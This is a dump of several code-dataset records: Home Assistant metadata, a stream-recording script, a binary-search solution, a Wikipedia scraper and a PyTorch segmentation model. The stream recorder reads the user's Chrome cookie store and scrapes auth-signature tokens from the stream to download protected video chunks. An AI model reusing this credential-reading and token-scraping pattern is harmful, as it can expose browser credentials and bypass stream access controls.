"const.DOMAIN", "line_number": 112, "usage_type": "name"}, {"api_name": "const.TUYA_HA_DEVICES", "line_number": 112, "usage_type": "name"}, {"api_name": "tuya_iot.TuyaDevice", "line_number": 119, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 125, "usage_type": "name"}, {"api_name": "const.TUYA_HA_TUYA_MAP", "line_number": 125, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 127, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 128, "usage_type": "name"}, {"api_name": "const.TUYA_HA_TUYA_MAP", "line_number": 128, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 130, "usage_type": "name"}, {"api_name": "const.TUYA_HA_TUYA_MAP", "line_number": 130, "usage_type": "name"}, {"api_name": "homeassistant.helpers.dispatcher.async_dispatcher_send", "line_number": 137, "usage_type": "call"}, {"api_name": "const.TUYA_DISCOVERY_NEW.format", "line_number": 138, "usage_type": "call"}, {"api_name": "const.TUYA_DISCOVERY_NEW", "line_number": 138, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 142, "usage_type": "name"}, {"api_name": "const.TUYA_DEVICE_MANAGER", "line_number": 142, "usage_type": "name"}, {"api_name": "tuya_iot.TuyaOpenMQ", "line_number": 144, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 155, "usage_type": "name"}, {"api_name": "const.TUYA_MQTT_LISTENER", "line_number": 155, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 157, "usage_type": "name"}, {"api_name": "const.TUYA_DEVICE_MANAGER", "line_number": 157, "usage_type": "name"}, {"api_name": "const.TUYA_SUPPORT_HA_TYPE", "line_number": 162, "usage_type": "name"}, {"api_name": "const.TUYA_SUPPORT_HA_TYPE", "line_number": 164, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 169, "usage_type": "name"}, {"api_name": "const.TUYA_SETUP_PLATFORM", "line_number": 169, "usage_type": "name"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 174, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 178, "usage_type": "name"}, {"api_name": "const.TUYA_DEVICE_MANAGER", "line_number": 178, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 182, "usage_type": "name"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 187, "usage_type": "name"}, {"api_name": "tuya_iot.tuya_logger.setLevel", "line_number": 200, "usage_type": "call"}, {"api_name": "tuya_iot.tuya_logger", "line_number": 200, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 201, "usage_type": "argument"}, {"api_name": "const.DOMAIN", "line_number": 209, "usage_type": "argument"}, {"api_name": "homeassistant.config_entries.SOURCE_IMPORT", "line_number": 209, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 206, "usage_type": "name"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 221, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 221, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 225, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 228, "usage_type": "name"}, {"api_name": "const.TUYA_DEVICE_MANAGER", "line_number": 228, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 230, "usage_type": "name"}, {"api_name": "const.TUYA_MQTT_LISTENER", "line_number": 230, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 232, "usage_type": "argument"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 237, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 237, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 241, "usage_type": "name"}, {"api_name": "const.TUYA_HA_TUYA_MAP", "line_number": 241, "usage_type": "name"}, {"api_name": "const.TUYA_HA_DEVICES", "line_number": 241, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 242, "usage_type": "name"}, {"api_name": "const.TUYA_SETUP_PLATFORM", "line_number": 242, "usage_type": "name"}]} +{"seq_id": "52073765", "text": "import requests\nimport time\nimport threading\nimport sys\nimport browsercookie\n\n# Values to be customised #\nbase_url = '' # base url of the stream\nserver = ''\nbase_time = 1800 # time in seconds to record for\nname = \"Stream\" # video file name\ncookie = \"\"\n# *********************** #\n\nheaders = {'Cookie' : cookie, 'Accept' : '*/*', 'Accept-Encoding' : 'gzip, deflate, sdch', 'Accept-Language' : 'en-US,en;q=0.8', 'Connection' : 'keep-alive', 'Host' : '', 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36'}\ncj = browsercookie.chrome()\n\nurl1 = \"\"\nr = requests.get(url1, headers=headers, cookies=cj)\n\nfirst_wmsAuthSign = r.text.split(\"$sig = \")[1].split(\"\\\"\")[1]\n\nurl2 = base_url + 'playlist.m3u8' + first_wmsAuthSign\nr = requests.get(url2, headers=headers, cookies=cj)\n\nsplit = r.text.split(\"nimblesessionid=\")[1]\nsessionId = split.split(\"&\")[0]\nwmsAuthSign = split.split(\"wmsAuthSign=\")[1]\n\nheaders = {'Cookie' : cookie, 'Accept' : '*/*', 'Accept-Encoding' : 'gzip, deflate, sdch', 'Accept-Language' : 'en-US,en;q=0.8', 'Connection' : 'keep-alive', 'Host' : server, 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36'}\npayload = {'nimblesessionid' : sessionId, 'wmsAuthSign' : wmsAuthSign}\n\nurl_list = []\n\ndata = []\n\nlock = threading.Lock()\n\nstopped = False\n\ndef time_passed(oldepoch):\n return (time.time() - oldepoch) >= base_time\n\ndef build_list():\n\turl = base_url + 'chunks.m3u8'\n\ttry:\n\t\tr = requests.get(url, params=payload, headers=headers)\n\t\tsplit = r.text.split(\"#EXTINF:4.004,\")\n\t\tfirst = split[1].split('?')[0].strip()\n\t\tsecond = split[2].split('?')[0].strip()\n\t\tthird = split[3].split('?')[0].strip()\n\texcept:\n\t\tprint (\"\\nError: Make sure sessionId, wmsAuthSign, and base_url are correct!\\n\")\n\telse:\n\t\twith lock:\n\t\t\tif first not in url_list:\n\t\t\t\turl_list.append(first)\n\t\t\tif second not in url_list:\n\t\t\t\turl_list.append(second)\n\t\t\tif third not in url_list:\n\t\t\t\turl_list.append(third)\n\t\t\tprint (\"\\nDownload queue: \" + str(len(url_list)))\n\t\t\treturn len(url_list)\n\ndef download_url():\n\n\ttmp_data = []\n\n\tpart = ''\n\twith lock:\n\t\tif (len(url_list) < 1):\n\t\t\treturn\n\t\tpart = url_list[0]\n\turl = base_url + part\n\n\t# NOTE the stream=True parameter\n\tr = requests.get(url, params=payload, headers=headers, stream=True)\n\n\tfor chunk in r.iter_content(chunk_size=1024):\n\t\tif chunk:\n\t\t\ttmp_data.append(chunk)\n\n\tlength = len(tmp_data)\n\n\tprint (\"\\nDownloading\")\n\tprint (\"Size (x1024): \" + str(length))\n\n\t# If the download failed\n\tif length is 1:\n\t\tdownload_url()\n\telse:\n\t\turl_list.pop(0)\n\n\tfor chunk in tmp_data:\n\t\tdata.append(chunk)\n\ndef save_data(name):\n\twith open(name + '.avi', 'wb') as f:\n\t for chunk in data:\n\t f.write(chunk)\n\n\ndef list_worker():\n\tglobal stopped\n\ttimestamp = time.time()\n\twhile not stopped and not time_passed(timestamp):\n\t\ttime.sleep(5)\n\t\tbuild_list()\n\tstopped = True # Set stopped to true so stop_worker quits\n\ndef download_worker():\n\tglobal stopped\n\tlist_count = build_list() # Build list so there is a starting point\n\twhile not stopped:\n\t\twith lock:\n\t\t\tlist_count = len(url_list)\n\t\tif (list_count > 3):\n\t\t\tdownload_url()\n\t\telse:\n\t\t\ttime.sleep(1)\n\ndef stop_worker():\n\tglobal stopped\n\twhile not stopped:\n\t\tresponse = raw_input(\"\\nType 'stop' and press enter to interrupt the download\\n\")\n\t\tif response:\n\t\t\tif 'stop' in response: # Break if response contains stop\n\t\t\t\tstopped = True # Set stopped to true so list_worker quits\n\t\t\t\tprint (\"\\nStopping...\\n\")\n\nlist_worker = threading.Thread(target=list_worker)\ndownload_worker = threading.Thread(target=download_worker)\nstop_worker = threading.Thread(target=stop_worker)\nstop_worker.start()\ndownload_worker.start()\nlist_worker.start()\ndownload_worker.join() # Wait for download_worker to finish\nsave_data(name)\nprint (\"\\nVideo has been saved. Press enter to quit.\\n\")\n", "sub_path": "downloader.py", "file_name": "downloader.py", "file_ext": "py", "file_size_in_byte": 3912, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "browsercookie.chrome", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 24, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 37, "usage_type": "call"}, {"api_name": "time.time", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 77, "usage_type": "call"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 120, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 131, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 132, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 133, "usage_type": "call"}]} +{"seq_id": "464555959", "text": "# 81. 搜索旋转排序数组 II\n# 假设按照升序排序的数组在预先未知的某个点上进行了旋转。\n#\n# ( 例如,数组 [0,0,1,2,2,5,6] 可能变为 [2,5,6,0,0,1,2] )。\n#\n# 编写一个函数来判断给定的目标值是否存在于数组中。若存在返回 true,否则返回 false。\n\n\nfrom typing import List\n\n\nclass Solution:\n # 中间元素和左边界比较\n def search(self, nums: List[int], target: int) -> bool:\n size = len(nums)\n if size == 0:\n return False\n\n left = 0\n right = size - 1\n\n while left < right:\n mid = (left + right) >> 1\n if nums[mid] > nums[left]:\n if nums[left] <= target <= nums[mid]:\n # 落在前有序数组里\n right = mid\n else:\n left = mid + 1\n elif nums[mid] < nums[left]:\n # 让分支和上面分支一样\n if nums[mid] < target <= nums[right]:\n left = mid + 1\n else:\n right = mid\n else:\n # 要排除掉左边界之前,先看一看左边界可以不可以排除\n if nums[left] == target:\n return True\n left = left + 1\n # 后处理,夹逼以后,还要判断一下,是不是 target\n return nums[left] == target\n", "sub_path": "17-二分查找/0081-搜索旋转排序数组 II-2.py", "file_name": "0081-搜索旋转排序数组 II-2.py", "file_ext": "py", "file_size_in_byte": 1421, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "typing.List", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "556490473", "text": "import csv,sqlite3\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen(\"https://en.wikipedia.org/wiki/List_of_universities_and_higher_education_colleges_in_London\")\nsoup = BeautifulSoup(html,'html.parser')\n\ntable = soup.find_all('table',{'class':'wikitable'})[0]\nrows = table.find_all('tr')\n\ncsvFile = open('crawling/data/LondonUni.csv','wt', newline = '', encoding ='utf-8')\n\nwrite=csv.writer(csvFile)\n\ntry:\n for row in rows:\n csvRow=[]\n for cell in row.find_all(['td','th']):\n csvRow.append(cell.get_text())\n write.writerow(csvRow)\n\nfinally:\n print('csv로 저장 되었습니다')\n csvFile.close()\n", "sub_path": "crawling/data/LondonUnisqlite.py", "file_name": "LondonUnisqlite.py", "file_ext": "py", "file_size_in_byte": 671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "urllib.request.urlopen", "line_number": 5, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 6, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "616256641", "text": "import torch,torch.nn as nn\nimport torch.nn.functional as F\nfrom .GuidedFilter.guided_filter import ConvGuidedFilter\n'''\n使用Swichable Norm\n'''\nclass SwitchNorm2d(nn.Module):\n\tdef __init__(self, num_features, eps=1e-5, momentum=0.9, using_moving_average=True, using_bn=True,\n\t\t\t\tlast_gamma=False):\n\t\tsuper(SwitchNorm2d, self).__init__()\n\t\tself.eps = eps\n\t\tself.momentum = momentum\n\t\tself.using_moving_average = using_moving_average\n\t\tself.using_bn = using_bn\n\t\tself.last_gamma = last_gamma\n\t\tself.weight = nn.Parameter(torch.ones(1, num_features, 1, 1))\n\t\tself.bias = nn.Parameter(torch.zeros(1, num_features, 1, 1))\n\t\tif self.using_bn:\n\t\t\tself.mean_weight = nn.Parameter(torch.ones(3))\n\t\t\tself.var_weight = nn.Parameter(torch.ones(3))\n\t\telse:\n\t\t\tself.mean_weight = nn.Parameter(torch.ones(2))\n\t\t\tself.var_weight = nn.Parameter(torch.ones(2))\n\t\tif self.using_bn:\n\t\t\tself.register_buffer('running_mean', torch.zeros(1, num_features, 1))\n\t\t\tself.register_buffer('running_var', torch.zeros(1, num_features, 1))\n\n\t\tself.reset_parameters()\n\n\tdef reset_parameters(self):\n\t\tif self.using_bn:\n\t\t\tself.running_mean.zero_()\n\t\t\tself.running_var.zero_()\n\t\tif self.last_gamma:\n\t\t\tself.weight.data.fill_(0)\n\t\telse:\n\t\t\tself.weight.data.fill_(1)\n\t\tself.bias.data.zero_()\n\n\tdef _check_input_dim(self, input):\n\t\tif input.dim() != 4:\n\t\t\traise ValueError('expected 4D input (got {}D input)'\n\t\t\t\t\t\t\t.format(input.dim()))\n\n\tdef forward(self, x):\n\t\tself._check_input_dim(x)\n\t\tN, C, H, W = x.size()\n\t\tx = x.view(N, C, -1)\n\t\tmean_in = x.mean(-1, keepdim=True)\n\t\tvar_in = x.var(-1, keepdim=True)\n\n\t\tmean_ln = mean_in.mean(1, keepdim=True)\n\t\ttemp = var_in + mean_in ** 2\n\t\tvar_ln = temp.mean(1, keepdim=True) - mean_ln ** 2\n\n\t\tif self.using_bn:\n\t\t\tif self.training:\n\t\t\t\tmean_bn = mean_in.mean(0, keepdim=True)\n\t\t\t\tvar_bn = temp.mean(0, keepdim=True) - mean_bn ** 2\n\t\t\t\tif self.using_moving_average:\n\t\t\t\t\tself.running_mean.mul_(self.momentum)\n\t\t\t\t\tself.running_mean.add_((1 - self.momentum) * mean_bn.data)\n\t\t\t\t\tself.running_var.mul_(self.momentum)\n\t\t\t\t\tself.running_var.add_((1 - self.momentum) * var_bn.data)\n\t\t\t\telse:\n\t\t\t\t\tself.running_mean.add_(mean_bn.data)\n\t\t\t\t\tself.running_var.add_(mean_bn.data ** 2 + var_bn.data)\n\t\t\telse:\n\t\t\t\tmean_bn = torch.autograd.Variable(self.running_mean)\n\t\t\t\tvar_bn = torch.autograd.Variable(self.running_var)\n\n\t\tsoftmax = nn.Softmax(0)\n\t\tmean_weight = softmax(self.mean_weight)\n\t\tvar_weight = softmax(self.var_weight)\n\n\t\tif self.using_bn:\n\t\t\tmean = mean_weight[0] * mean_in + mean_weight[1] * mean_ln + mean_weight[2] * mean_bn\n\t\t\tvar = var_weight[0] * var_in + var_weight[1] * var_ln + var_weight[2] * var_bn\n\t\telse:\n\t\t\tmean = mean_weight[0] * mean_in + mean_weight[1] * mean_ln\n\t\t\tvar = var_weight[0] * var_in + var_weight[1] * var_ln\n\n\t\tx = (x-mean) / (var+self.eps).sqrt()\n\t\tx = x.view(N, C, H, W)\n\t\treturn x * self.weight + self.bias\n\t\t\nclass BasicBlock(nn.Module):\n\texpansion = 1\n\tdef __init__(self,in_dim,out_dim,stride=1,downsample=None,norm=False):\n\t\tsuper(BasicBlock,self).__init__()\n\t\tself.norm=norm\n\t\tself.conv1=nn.Conv2d(in_dim,out_dim,3,stride,1)\n\t\tself.norm1 = SwitchNorm2d(out_dim) if self.norm else None\n\t\tself.relu=nn.ReLU(inplace=True)\n\t\tself.conv2=nn.Conv2d(out_dim,out_dim,3,1,1)\n\t\tself.norm2 = SwitchNorm2d(out_dim) if self.norm else None\n\t\tself.downsample=downsample\n\tdef forward(self,x):\n\t\tresidual=x\n\t\tif self.norm:\n\t\t\tout=self.relu(self.norm1(self.conv1(x)))\n\t\t\tout=self.norm2(self.conv2(out))\n\t\telse :\n\t\t\tout=self.relu(self.conv1(x))\n\t\t\tout=self.conv2(out)\n\t\tif self.downsample is not None:\n\t\t\tresidual=self.downsample(residual)\n\t\tskip=out+residual\n\t\tout=self.relu(skip)#改了。。\n\t\treturn skip,out\nclass ResNet18(nn.Module):\n\tdef __init__(self,color=4,layers=[2,2,2,2],features=[16,32,64,64],norm=False):\n\t\tself.inplanes=features[0]\n\t\tself.norm=norm\n\t\tsuper(ResNet18,self).__init__()\n\t\tself.conv1 = nn.Conv2d(color, features[0], kernel_size=7, stride=2, padding=3,\n\t\t\t\t\t\t\tbias=True)\n\t\tself.norm1=SwitchNorm2d(features[0]) if self.norm else None\n\t\tself.relu = nn.ReLU(inplace=True)\n\t\tself.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\t\tblock=BasicBlock\n\t\tself.layer1 = self._make_layer(block, features[0], layers[0])\n\t\tself.layer2 = self._make_layer(block, features[1], layers[1], stride=2)\n\t\tself.layer3 = self._make_layer(block, features[2], layers[2], stride=2)\n\t\tself.layer4 = self._make_layer(block, features[3], layers[3], stride=2)\n\tdef _make_layer(self, block, planes, blocks, stride=1):\n\t\tdownsample = None\n\t\tif stride != 1 or self.inplanes != planes * block.expansion:\n\t\t\tdownsample = nn.Sequential(\n\t\t\t\tnn.Conv2d(self.inplanes, planes * block.expansion,\n\t\t\t\t\t\tkernel_size=1, stride=stride, bias=False))\n\t\tlayers = []\n\t\tlayers.append(block(self.inplanes, planes, stride, downsample,norm=self.norm))\n\t\tself.inplanes = planes * block.expansion\n\t\tfor i in range(1, blocks):\n\t\t\tlayers.append(block(self.inplanes, planes,norm=self.norm))\n\t\treturn nn.Sequential(*layers)\n\tdef forward_layer(self, x, layer):\n\t\tskip = None\n\t\tfor l in layer:\n\t\t\tx = l(x)\n\t\t\tif isinstance(x, tuple):\n\t\t\t\tskip,x = x\n\t\treturn skip,x\n\tdef forward(self,x1):\n\t\tx2=self.relu(self.conv1(x1))\n\t\tx4=self.maxpool(x2)\n\t\tx4,x=self.forward_layer(x4,self.layer1)\n\t\tx8,x=self.forward_layer(x,self.layer2)\n\t\tx16,x=self.forward_layer(x,self.layer3)\n\t\tx32,x=self.forward_layer(x,self.layer4)\n\t\treturn x1,x2,x4,x8,x16,x32\n\n\nupsample = lambda x, size: F.interpolate(x, size, mode='bilinear', align_corners=False)\nclass ReluConv(nn.Sequential):\n\tdef __init__(self, in_dim, out_dim,k=3,norm=False):\n\t\tsuper(ReluConv, self).__init__()\n\t\tif norm:\n\t\t\tself.add_module('norm', SwitchNorm2d(in_dim))#使用BN\n\t\tself.add_module('relu', nn.ReLU(inplace=False))\n\t\tself.add_module('conv', nn.Conv2d(in_dim, out_dim, kernel_size=k, padding=k//2))\nclass SpatialPyramidPooling(nn.Module):\n\tdef __init__(self, num_maps_in, num_levels=3, bt_size=128, out_size=128,grids=(8, 4, 2, 1), square_grid=False,fixed_size=None,norm=False):\n\t\tsuper(SpatialPyramidPooling, self).__init__()\n\t\tlevel_size = out_size // num_levels\n\t\tself.fixed_size = fixed_size\n\t\tself.grids = grids\n\t\tif self.fixed_size:\n\t\t\tref = min(self.fixed_size)\n\t\t\tself.grids = list(filter(lambda x: x <= ref, self.grids))\n\t\tself.square_grid = square_grid\n\t\tself.upsampling_method = upsample\n\t\tif self.fixed_size is not None:\n\t\t\tself.upsampling_method = lambda x, size: F.interpolate(x, mode='nearest', size=fixed_size)\n\t\tself.spp = nn.Sequential()\n\t\tself.spp.add_module('spp_bn', ReluConv(num_maps_in, bt_size, k=1,norm=norm))\n\t\tnum_features = bt_size\n\t\tfinal_size = num_features\n\t\tfor i in range(num_levels):\n\t\t\tfinal_size += level_size\n\t\t\tself.spp.add_module('spp' + str(i),ReluConv(num_features, level_size, k=1,norm=norm))\n\t\tself.spp.add_module('spp_fuse',ReluConv(final_size, out_size, k=1,norm=norm))\n\tdef forward(self, x):\n\t\tlevels = []\n\t\ttarget_size = self.fixed_size if self.fixed_size is not None else x.size()[2:4]\n\t\tar = target_size[1] / target_size[0]\n\t\tx = self.spp[0].forward(x)\n\t\tlevels.append(x)\n\t\tnum = len(self.spp) - 1\n\t\tfor i in range(1, num):\n\t\t\tif not self.square_grid:\n\t\t\t\tgrid_size = (self.grids[i - 1], max(1, round(ar * self.grids[i - 1])))\n\t\t\t\tx_pooled = F.adaptive_avg_pool2d(x, grid_size)#input,output_size\n\t\t\telse:\n\t\t\t\tx_pooled = F.adaptive_avg_pool2d(x, self.grids[i - 1])\n\t\t\tlevel = self.spp[i].forward(x_pooled)\n\t\t\tlevel = self.upsampling_method(level, target_size)\n\t\t\tlevels.append(level)\n\t\tx = torch.cat(levels, 1)\n\t\tx = self.spp[-1].forward(x)\n\t\treturn x\nclass _Upsample(nn.Module):\n\tdef __init__(self, num_maps_in, skip_maps_in, num_maps_out, k=3,norm=False):\n\t\tsuper(_Upsample, self).__init__()\n\t\tself.skip_conv = ReluConv(skip_maps_in, num_maps_in, k=1,norm=norm)\n\t\tself.blend_conv = ReluConv(num_maps_in, num_maps_out, k=k,norm=norm)\n\t\tself.upsampling_method = upsample\n\tdef forward(self,skip,x):\n\t\tskip = self.skip_conv.forward(skip)\n\t\tskip_size = skip.size()[2:4]\n\t\tx = self.upsampling_method(x, skip_size)#x.size()->skip.size()!!\n\t\tx = x + skip #element add\n\t\tx = self.blend_conv.forward(x)\n\t\treturn x\nclass Decoder(nn.Module):#out_dim=128 decoder to x4\n\tdef __init__(self,features=[16,32,64,64],in_dim=64,norm=False):\n\t\tsuper(Decoder,self).__init__()\n\t\tself.up1=_Upsample(in_dim,features[-2],features[-2],norm=norm)#original outdim=128\n\t\tself.up2=_Upsample(features[-2],features[-3],features[-3],norm=norm)\n\t\tself.up3=_Upsample(features[-3],features[-4],features[-4],norm=norm)\n\tdef forward(self,x32,x16,x8,x4):\n\t\tout=self.up1(x16,x32)#x16\n\t\tout=self.up2(x8,out)#x8\n\t\tout=self.up3(x4,out)#x4\n\t\treturn out\nclass AdaptiveNorm(nn.Module):\n\tdef __init__(self, n):\n\t\tsuper(AdaptiveNorm, self).__init__()\n\t\tself.w_0 = nn.Parameter(torch.Tensor([1.0]))\n\t\tself.w_1 = nn.Parameter(torch.Tensor([0.0]))\n\t\tself.bn = SwitchNorm2d(n, momentum=0.999, eps=0.001)\n\tdef forward(self, x):\n\t\treturn self.w_0 * x + self.w_1 * self.bn(x)\n\nclass SwiftNetSlim_GFL_SN(nn.Module):\n\tdef __init__(self,incolor=4,outcolor=3,features=[16,32,64,64],norm=False):\n\t\tsuper(SwiftNetSlim_GFL_SN,self).__init__()\n\t\tself.sppdim=64 #original 128\n\t\tself.encoder=ResNet18(incolor,features=features,norm=norm)#original features:[64,128,256,512]\n\t\tself.spp=SpatialPyramidPooling(features[-1],out_size=self.sppdim,norm=norm)\n\t\tself.decoder=Decoder(features,in_dim=self.sppdim,norm=norm)\n\t\tself.post=ReluConv(features[-4],outcolor,1,norm=norm)\n\t\tself.filter = ConvGuidedFilter(1, norm=AdaptiveNorm)\n\t\tself.guided_map = nn.Sequential(\n\t\t\tnn.Conv2d(3, 16, 1, bias=False),\n\t\t\tAdaptiveNorm(16),\n\t\t\tnn.LeakyReLU(0.2, inplace=True),\n\t\t\tnn.Conv2d(16, 3, 1)\n\t\t)\n\tdef forward(self,x):\n\t\timage_size=x.size()[2:4]\n\t\tx1,x2,x4,x8,x16,x32=self.encoder(x)\n\t\tx32=self.spp(x32)\n\t\tout_x4=self.decoder(x32,x16,x8,x4)\n\t\tout_x4=self.post(out_x4)\n\t\t# out=upsample(out_x4,image_size)\n\t\tx_h=x[:,:3,::];x_l=F.interpolate(x_h,scale_factor=0.25)\n\t\tout=self.filter(self.guided_map(x_l),out_x4,self.guided_map(x_h))\n\t\treturn out_x4,out\n\nif __name__ == \"__main__\":\n\n\t#devisor=32\n\tx=torch.zeros([1,4,160,160])\n\tnet=SwiftNetSlim_GFL_SN(norm=True)\n\tprint(sum([p.numel() for p in net.parameters()]))\n\t# net(x)\n\tprint(net)\n\n\t\n", "sub_path": "net/deprecated/models/SwiftNetSlim_GFL_SN.py", "file_name": "SwiftNetSlim_GFL_SN.py", "file_ext": "py", "file_size_in_byte": 10052, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.nn.Module", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 70, "usage_type": "attribute"}, {"api_name": "torch.nn.Softmax", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 87, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 87, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 95, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 119, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 130, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 155, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 156, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 162, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 163, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 163, "usage_type": "name"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 175, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 176, "usage_type": "name"}, {"api_name": "torch.nn.functional.adaptive_avg_pool2d", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 194, "usage_type": "name"}, {"api_name": "torch.nn.functional.adaptive_avg_pool2d", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 200, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 203, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 203, "usage_type": "name"}, {"api_name": "torch.nn.Module", 